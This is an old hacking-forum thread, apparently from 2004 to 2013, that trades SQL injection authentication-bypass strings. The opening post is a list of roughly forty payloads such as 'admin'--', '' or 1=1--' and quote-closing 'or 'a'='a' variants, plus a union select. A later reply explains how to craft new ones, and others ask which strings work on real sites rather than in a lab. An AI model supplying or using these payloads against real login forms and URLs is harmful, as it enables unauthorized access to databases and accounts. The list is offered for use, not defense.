Sponsored by: █ Sparkhost - Hosting Without Compromises! █ Hybrid Performance Web Hosting █ Spark Host Stream Hosting █ Hybrid IRC & IRCd Server Shell Accounts
Sql Injection Strings!
#1
Posted 14 April 2004 - 01:16 PM
List so far:
admin'--
' or 1=1--
'" or 1=1--
' union select 1, 'Eyeless', 'ez2do', 1--
admin'--
administrator'--
superuser'--
test'--
' or 0=0 --
' or 0=0 --'
' or 0=0 #
" or 0=0 --
" or 0=0 --'
'" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
" or 1=1--
or 1=1--
' or a=a--'
' or a=a #
' or a=a--
' or "a"="a
' or 'a'='a
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
#2
Posted 14 April 2004 - 01:54 PM
Subscribe To Our RSS Feed For the Latest News from GovernmentSecurity.orgWould you like to earn money posting on GSO?
#4
Posted 14 April 2004 - 02:15 PM
also I noticed you add ' hi" or 1=1 -- ' would changeing the word have any effect? Maybe trying common usernames?
#5
Posted 14 April 2004 - 02:25 PM
SQL is simple, learn how exactly it gets read and other possibilities of doing it... then you could make your own!
example
" or "a"="a
') or ('a'='a
on some databases one would work, other wouldn't.. first one would enclose the username (or pass) in quotes... first it would CLOSE the quotes (making it "") and then says.. or "a"="a.. the last quote would be closeing the final a.. and "a"="a" is always true, so that would be how it works
however, the second uses ('Username').. and changing it to say "('') or ('a'='a')"
so to answer your question, YES another word can be put in....
#6
Posted 14 April 2004 - 02:32 PM
#7
Posted 18 April 2004 - 02:15 PM
No ones postin',wait,oooo,damn nope,*pissed*
#8
Posted 17 April 2012 - 04:54 AM
below I am giving you the link to the teaser of a new Hakin9 Magazin in which the main topic is SQL Injection. To download it you have to register on the free account.
Here is the link: http://hakin9.org/wp...load.php?id=221 I hope it is helpful
#9
Posted 27 June 2012 - 05:18 AM
#10
Posted 08 March 2013 - 08:53 PM
Well i appreciate your effort regarding this but have you tried these strings your self to know which of them work and which of them don't? personally iam graping the strings that i assure to work in real world enviroment , not in LAB etc. can you please tell me which ones you tried and they worked?
tnx 4 guide
no, i dont try all of them,
because i don't wanna hack a website or fetch informations and like this
actually i work on first step of SQL Injection hacking, and need to test website to understand that website is Vulnerable or no
i clollected my string from a forum and my software gives that string and inject them to website URL after '?'
plz Help!
tnx ![]()
#11
Posted 08 March 2013 - 09:09 PM
LOOOOOOOOOOOOOOL wrong post
)))
but not matter,
like Eyeless i'm working on sql injection and i think we hase same problem
0 user(s) are reading this topic
0 members, 0 guests, 0 anonymous users












